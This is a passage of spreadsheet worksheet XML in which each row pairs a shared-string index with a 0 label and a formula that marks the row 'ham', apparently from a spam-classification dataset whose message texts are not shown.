    <row r="2970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2970" t="s">
        <v>2409</v>
      </c>
      <c r="B2970">
        <v>0</v>
      </c>
      <c r="C2970" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2971" t="s">
        <v>2410</v>
      </c>
      <c r="B2971">
        <v>0</v>
      </c>
      <c r="C2971" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2972" t="s">
        <v>2411</v>
      </c>
      <c r="B2972">
        <v>0</v>
      </c>
      <c r="C2972" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2973" t="s">
        <v>2412</v>
      </c>
      <c r="B2973">
        <v>0</v>
      </c>
      <c r="C2973" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2974" t="s">
        <v>2413</v>
      </c>
      <c r="B2974">
        <v>0</v>
      </c>
      <c r="C2974" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2975" t="s">
        <v>2414</v>
      </c>
      <c r="B2975">
        <v>0</v>
      </c>
      <c r="C2975" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2976" t="s">
        <v>2415</v>
      </c>
      <c r="B2976">
        <v>0</v>
      </c>
      <c r="C2976" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2977" t="s">
        <v>2416</v>
      </c>
      <c r="B2977">
        <v>0</v>
      </c>
      <c r="C2977" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2978" t="s">
        <v>2417</v>
      </c>
      <c r="B2978">
        <v>0</v>
      </c>
      <c r="C2978" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2979" t="s">
        <v>2418</v>
      </c>
      <c r="B2979">
        <v>0</v>
      </c>
      <c r="C2979" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2980" t="s">
        <v>2419</v>
      </c>
      <c r="B2980">
        <v>0</v>
      </c>
      <c r="C2980" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2981" t="s">
        <v>2420</v>
      </c>
      <c r="B2981">
        <v>0</v>
      </c>
      <c r="C2981" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2982" t="s">
        <v>2421</v>
      </c>
      <c r="B2982">
        <v>0</v>
      </c>
      <c r="C2982" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2983" t="s">
        <v>2422</v>
      </c>
      <c r="B2983">
        <v>0</v>
      </c>
      <c r="C2983" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2984" t="s">
        <v>2423</v>
      </c>
      <c r="B2984">
        <v>0</v>
      </c>
      <c r="C2984" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2985" t="s">
        <v>2424</v>
      </c>
      <c r="B2985">
        <v>0</v>
      </c>
      <c r="C2985" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2986" t="s">
        <v>2425</v>
      </c>
      <c r="B2986">
        <v>0</v>
      </c>
      <c r="C2986" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2987" t="s">
        <v>2426</v>
      </c>
      <c r="B2987">
        <v>0</v>
      </c>
      <c r="C2987" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2988" t="s">
        <v>2427</v>
      </c>
      <c r="B2988">
        <v>0</v>
      </c>
      <c r="C2988" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2989" t="s">
        <v>2428</v>
      </c>
      <c r="B2989">
        <v>0</v>
      </c>
      <c r="C2989" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2990" t="s">
        <v>2429</v>
      </c>
      <c r="B2990">
        <v>0</v>
      </c>
      <c r="C2990" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2991" t="s">
        <v>21</v>
      </c>
      <c r="B2991">
        <v>0</v>
      </c>
      <c r="C2991" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2992" t="s">
        <v>2430</v>
      </c>
      <c r="B2992">
        <v>0</v>
      </c>
      <c r="C2992" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2993" t="s">
        <v>21</v>
      </c>
      <c r="B2993">
        <v>0</v>
      </c>
      <c r="C2993" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2994" t="s">
        <v>2431</v>
      </c>
      <c r="B2994">
        <v>0</v>
      </c>
      <c r="C2994" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2995" t="s">
        <v>2432</v>
      </c>
      <c r="B2995">
        <v>0</v>
      </c>
      <c r="C2995" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2996" t="s">
        <v>2433</v>
      </c>
      <c r="B2996">
        <v>0</v>
      </c>
      <c r="C2996" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2997" t="s">
        <v>2434</v>
      </c>
      <c r="B2997">
        <v>0</v>
      </c>
      <c r="C2997" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2998" t="s">
        <v>2435</v>
      </c>
      <c r="B2998">
        <v>0</v>
      </c>
      <c r="C2998" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2999" t="s">
        <v>2436</v>
      </c>
      <c r="B2999">
        <v>0</v>
      </c>
      <c r="C2999" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3000" t="s">
        <v>2437</v>
      </c>
      <c r="B3000">
        <v>0</v>
      </c>
      <c r="C3000" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3001" t="s">
        <v>2438</v>
      </c>
      <c r="B3001">
        <v>0</v>
      </c>
      <c r="C3001" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3002" t="s">
        <v>2439</v>
      </c>
      <c r="B3002">
        <v>0</v>
      </c>
      <c r="C3002" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3003" t="s">
        <v>2440</v>
      </c>
      <c r="B3003">
        <v>0</v>
      </c>
      <c r="C3003" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3004" t="s">
        <v>2441</v>
      </c>
      <c r="B3004">
        <v>0</v>
      </c>
      <c r="C3004" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3005" t="s">
        <v>2442</v>
      </c>
      <c r="B3005">
        <v>0</v>
      </c>
      <c r="C3005" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3006" t="s">
        <v>2443</v>
      </c>
      <c r="B3006">
        <v>0</v>
      </c>
      <c r="C3006" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3007" t="s">
        <v>2444</v>
      </c>
      <c r="B3007">
        <v>0</v>
      </c>
      <c r="C3007" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3008" t="s">
        <v>2445</v>
      </c>
      <c r="B3008">
        <v>0</v>
      </c>
      <c r="C3008" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3009" t="s">
        <v>2446</v>
      </c>
      <c r="B3009">
        <v>0</v>
      </c>
      <c r="C3009" t="str">
        <f t="shared" si="46"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3010" t="s">
        <v>2447</v>
      </c>
      <c r="B3010">
        <v>0</v>
      </c>
      <c r="C3010" t="str">
        <f t="shared" ref="C3010:C3073" si="47">IF(B3010="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3011" t="s">
        <v>2448</v>
      </c>
      <c r="B3011">
        <v>0</v>
      </c>
      <c r="C3011" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3012" t="s">
        <v>2449</v>
      </c>
      <c r="B3012">
        <v>0</v>
      </c>
      <c r="C3012" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3013" t="s">
        <v>2450</v>
      </c>
      <c r="B3013">
        <v>0</v>
      </c>
      <c r="C3013" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3014" t="s">
        <v>2451</v>
      </c>
      <c r="B3014">
        <v>0</v>
      </c>
      <c r="C3014" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3015" t="s">
        <v>2452</v>
      </c>
      <c r="B3015">
        <v>0</v>
      </c>
      <c r="C3015" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3016" t="s">
        <v>2453</v>
      </c>
      <c r="B3016">
        <v>0</v>
      </c>
      <c r="C3016" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3017" t="s">
        <v>2454</v>
      </c>
      <c r="B3017">
        <v>0</v>
      </c>
      <c r="C3017" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3018" t="s">
        <v>2455</v>
      </c>
      <c r="B3018">
        <v>0</v>
      </c>
      <c r="C3018" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3019" t="s">
        <v>2456</v>
      </c>
      <c r="B3019">
        <v>0</v>
      </c>
      <c r="C3019" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3020" t="s">
        <v>2457</v>
      </c>
      <c r="B3020">
        <v>0</v>
      </c>
      <c r="C3020" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3021" t="s">
        <v>2458</v>
      </c>
      <c r="B3021">
        <v>0</v>
      </c>
      <c r="C3021" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3022" t="s">
        <v>2459</v>
      </c>
      <c r="B3022">
        <v>0</v>
      </c>
      <c r="C3022" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3023" t="s">
        <v>2460</v>
      </c>
      <c r="B3023">
        <v>0</v>
      </c>
      <c r="C3023" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3024" t="s">
        <v>21</v>
      </c>
      <c r="B3024">
        <v>0</v>
      </c>
      <c r="C3024" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3025" t="s">
        <v>2461</v>
      </c>
      <c r="B3025">
        <v>0</v>
      </c>
      <c r="C3025" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3026" t="s">
        <v>21</v>
      </c>
      <c r="B3026">
        <v>0</v>
      </c>
      <c r="C3026" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3027" t="s">
        <v>21</v>
      </c>
      <c r="B3027">
        <v>0</v>
      </c>
      <c r="C3027" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3028" t="s">
        <v>21</v>
      </c>
      <c r="B3028">
        <v>0</v>
      </c>
      <c r="C3028" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3029" t="s">
        <v>21</v>
      </c>
      <c r="B3029">
        <v>0</v>
      </c>
      <c r="C3029" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3030" t="s">
        <v>2462</v>
      </c>
      <c r="B3030">
        <v>0</v>
      </c>
      <c r="C3030" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3031" t="s">
        <v>2463</v>
      </c>
      <c r="B3031">
        <v>0</v>
      </c>
      <c r="C3031" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3032" t="s">
        <v>2464</v>
      </c>
      <c r="B3032">
        <v>0</v>
      </c>
      <c r="C3032" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3033" t="s">
        <v>21</v>
      </c>
      <c r="B3033">
        <v>0</v>
      </c>
      <c r="C3033" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3034" t="s">
        <v>21</v>
      </c>
      <c r="B3034">
        <v>0</v>
      </c>
      <c r="C3034" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3035" t="s">
        <v>2465</v>
      </c>
      <c r="B3035">
        <v>0</v>
      </c>
      <c r="C3035" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3036" t="s">
        <v>2466</v>
      </c>
      <c r="B3036">
        <v>0</v>
      </c>
      <c r="C3036" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3037" t="s">
        <v>2467</v>
      </c>
      <c r="B3037">
        <v>0</v>
      </c>
      <c r="C3037" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3038" t="s">
        <v>2468</v>
      </c>
      <c r="B3038">
        <v>0</v>
      </c>
      <c r="C3038" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3039" t="s">
        <v>2469</v>
      </c>
      <c r="B3039">
        <v>0</v>
      </c>
      <c r="C3039" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3040" t="s">
        <v>2470</v>
      </c>
      <c r="B3040">
        <v>0</v>
      </c>
      <c r="C3040" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3041" t="s">
        <v>2471</v>
      </c>
      <c r="B3041">
        <v>0</v>
      </c>
      <c r="C3041" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3042" t="s">
        <v>2472</v>
      </c>
      <c r="B3042">
        <v>0</v>
      </c>
      <c r="C3042" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3043" t="s">
        <v>2473</v>
      </c>
      <c r="B3043">
        <v>0</v>
      </c>
      <c r="C3043" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3044" t="s">
        <v>2474</v>
      </c>
      <c r="B3044">
        <v>0</v>
      </c>
      <c r="C3044" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3045" t="s">
        <v>21</v>
      </c>
      <c r="B3045">
        <v>0</v>
      </c>
      <c r="C3045" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3046" t="s">
        <v>21</v>
      </c>
      <c r="B3046">
        <v>0</v>
      </c>
      <c r="C3046" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3047" t="s">
        <v>2475</v>
      </c>
      <c r="B3047">
        <v>0</v>
      </c>
      <c r="C3047" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3048" t="s">
        <v>2476</v>
      </c>
      <c r="B3048">
        <v>0</v>
      </c>
      <c r="C3048" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3049" t="s">
        <v>21</v>
      </c>
      <c r="B3049">
        <v>0</v>
      </c>
      <c r="C3049" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3050" t="s">
        <v>2477</v>
      </c>
      <c r="B3050">
        <v>0</v>
      </c>
      <c r="C3050" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3051" t="s">
        <v>2478</v>
      </c>
      <c r="B3051">
        <v>0</v>
      </c>
      <c r="C3051" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3052" t="s">
        <v>2479</v>
      </c>
      <c r="B3052">
        <v>0</v>
      </c>
      <c r="C3052" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3053" t="s">
        <v>2480</v>
      </c>
      <c r="B3053">
        <v>0</v>
      </c>
      <c r="C3053" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3054" t="s">
        <v>2481</v>
      </c>
      <c r="B3054">
        <v>0</v>
      </c>
      <c r="C3054" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3055" t="s">
        <v>2482</v>
      </c>
      <c r="B3055">
        <v>0</v>
      </c>
      <c r="C3055" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3056" t="s">
        <v>21</v>
      </c>
      <c r="B3056">
        <v>0</v>
      </c>
      <c r="C3056" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3057" t="s">
        <v>2483</v>
      </c>
      <c r="B3057">
        <v>0</v>
      </c>
      <c r="C3057" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3058" t="s">
        <v>2484</v>
      </c>
      <c r="B3058">
        <v>0</v>
      </c>
      <c r="C3058" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3059" t="s">
        <v>21</v>
      </c>
      <c r="B3059">
        <v>0</v>
      </c>
      <c r="C3059" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3060" t="s">
        <v>2485</v>
      </c>
      <c r="B3060">
        <v>0</v>
      </c>
      <c r="C3060" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3061" t="s">
        <v>2486</v>
      </c>
      <c r="B3061">
        <v>0</v>
      </c>
      <c r="C3061" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3062" t="s">
        <v>2487</v>
      </c>
      <c r="B3062">
        <v>0</v>
      </c>
      <c r="C3062" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3063" t="s">
        <v>2488</v>
      </c>
      <c r="B3063">
        <v>0</v>
      </c>
      <c r="C3063" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3064" t="s">
        <v>2489</v>
      </c>
      <c r="B3064">
        <v>0</v>
      </c>
      <c r="C3064" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3065" t="s">
        <v>21</v>
      </c>
      <c r="B3065">
        <v>0</v>
      </c>
      <c r="C3065" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3066" t="s">
        <v>2490</v>
      </c>
      <c r="B3066">
        <v>0</v>
      </c>
      <c r="C3066" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3067" t="s">
        <v>21</v>
      </c>
      <c r="B3067">
        <v>0</v>
      </c>
      <c r="C3067" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3068" t="s">
        <v>2491</v>
      </c>
      <c r="B3068">
        <v>0</v>
      </c>
      <c r="C3068" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3069" t="s">
        <v>2492</v>
      </c>
      <c r="B3069">
        <v>0</v>
      </c>
      <c r="C3069" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3070" t="s">
        <v>2493</v>
      </c>
      <c r="B3070">
        <v>0</v>
      </c>
      <c r="C3070" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3071" t="s">
        <v>2494</v>
      </c>
      <c r="B3071">
        <v>0</v>
      </c>
      <c r="C3071" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3072" t="s">
        <v>2495</v>
      </c>
      <c r="B3072">
        <v>0</v>
      </c>
      <c r="C3072" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3073" t="s">
        <v>2496</v>
      </c>
      <c r="B3073">
        <v>0</v>
      </c>
      <c r="C3073" t="str">
        <f t="shared" si="47"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3074" t="s">
        <v>2497</v>
      </c>
      <c r="B3074">
        <v>0</v>
      </c>
      <c r="C3074" t="str">
        <f t="shared" ref="C3074:C3137" si="48">IF(B3074="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3075" t="s">
        <v>2498</v>
      </c>
      <c r="B3075">
        <v>0</v>
      </c>
      <c r="C3075" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3076" t="s">
        <v>2499</v>
      </c>
      <c r="B3076">
        <v>0</v>
      </c>
      <c r="C3076" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3077" t="s">
        <v>2500</v>
      </c>
      <c r="B3077">
        <v>0</v>
      </c>
      <c r="C3077" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3078" t="s">
        <v>21</v>
      </c>
      <c r="B3078">
        <v>0</v>
      </c>
      <c r="C3078" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3079" t="s">
        <v>2501</v>
      </c>
      <c r="B3079">
        <v>0</v>
      </c>
      <c r="C3079" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3080" t="s">
        <v>21</v>
      </c>
      <c r="B3080">
        <v>0</v>
      </c>
      <c r="C3080" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3081" t="s">
        <v>2502</v>
      </c>
      <c r="B3081">
        <v>0</v>
      </c>
      <c r="C3081" t="str">
        <f t="shared" si="48"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3082" t="s">
        <v>2503</v>
      </c>
